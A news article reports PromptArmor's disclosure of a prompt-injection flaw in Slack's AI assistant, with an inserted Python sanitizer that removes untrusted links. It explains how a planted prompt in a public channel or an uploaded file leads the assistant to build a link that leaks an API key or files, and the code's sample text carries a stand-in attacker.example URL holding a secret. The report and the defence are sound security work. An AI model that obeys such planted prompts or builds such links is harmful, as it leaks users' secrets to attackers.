Slack AI Could Be Tricked into Leaking Your Sensitive Data

Security experts have just discovered a significant vulnerability in Slack’s AI assistant that may lead to sensitive data exposure.

Slack is a platform used by more than 35 million people throughout the world, and it introduced its AI tool back in September 2023. The feature summarizes unread messages for users, answers questions, and even searches for files. All of this is very convenient but, it turns out, comes at a very steep price.

Security firm PromptArmor, which revealed the vulnerability, said it shows how an attacker can leverage the AI by crafting a prompt specifically tailored to do so.

Essentially, the vulnerability could allow hackers to extract sensitive information from private Slack channels that they are not members of.

How the Attack Works

PromptArmor demonstrated the attack with, among other things, the theft of an API key.

Basically, the attacker would create a public Slack channel and add a malicious prompt to it. The AI assistant would then read that prompt, causing the LLM to generate a clickable URL in its response.

When this URL is clicked, it sends the API key to an attacker-controlled website.

But that’s not all; API keys are not the only thing that can be extracted. According to researchers, this vulnerability enables the extraction of files people upload to Slack.

Because the AI reads uploaded files, an attacker need not even become part of the workspace to steal sensitive information.

For example, an attacker only needs to embed a malicious prompt inside a document and convince a member of the workspace to upload it, thereby achieving the same result. Even a PDF containing malicious instructions could trigger the vulnerability if uploaded to Slack.
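
One mitigation for the link-based exfiltration described above, shown as an added example that is not from the article, PromptArmor or Slack: before an AI answer is rendered, links to hosts outside an allowlist are neutralized so that nothing clickable can carry data off-site. The allowlist, the function names and the sample text are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the workspace trusts for links in AI-generated answers.
ALLOWED_HOSTS = {"slack.com", "example-corp.com"}
MD_LINK = re.compile(r"\[([^\]]*)\]\((\s*[^)\s]+)\s*\)")   # [label](url)
BARE_URL = re.compile(r"https?://[^\s<>()\]]+")            # bare http(s) URL

# Constructed sample of an AI answer that was steered by injected text.
SAMPLE = ("Here is what I found. "
          "[click here](https://attacker.example/?secret=CONSTRUCTED-KEY-123) "
          "See also https://slack.com/help for docs.")


def host_allowed(url: str) -> bool:
    """True only for http(s) URLs on an allowlisted domain or its subdomains."""
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:          # malformed URL: treat as untrusted
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    return any(host == d or host.endswith("." + d) for d in ALLOWED_HOSTS)


def sanitize_ai_output(text: str):
    """Return (safe_text, blocked_urls). Untrusted links lose their URL and
    keep only the label plus a marker, so a click cannot send data anywhere."""
    blocked = []

    def md_repl(m):
        label, url = m.group(1), m.group(2).strip()
        if host_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"{label} [link removed]"

    def bare_repl(m):
        url = m.group(0)
        if host_allowed(url):
            return url
        blocked.append(url)
        return "[link removed]"

    text = MD_LINK.sub(md_repl, text)   # labelled links first
    return BARE_URL.sub(bare_repl, text), blocked
```

The `blocked` list can be logged so that responders see which destinations an AI answer tried to link to.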

Salesforce response

Salesforce, which owns the platform, says that it has acknowledged the issue and has since fixed it.

A Salesforce spokesperson explained to TechRadar Pro: “After being alerted to the report, we investigated the scenario described in which, under very specific and narrow conditions, a bad actor with existing access on the same Slack workspace could attempt to phish certain users for specific data. We have released a patch that resolves the vulnerability, and at this time, we do not have evidence of unauthorized access to customer data.”

However, PromptArmor pointed out that Salesforce did say that “messages posted to public channels can be searched for and viewed by all members of the workspace, regardless of whether they have joined the channel or not. This is intended behavior.”

Rahul Bodana is a News Writer delivering timely, accurate, and compelling stories that keep readers informed and engaged.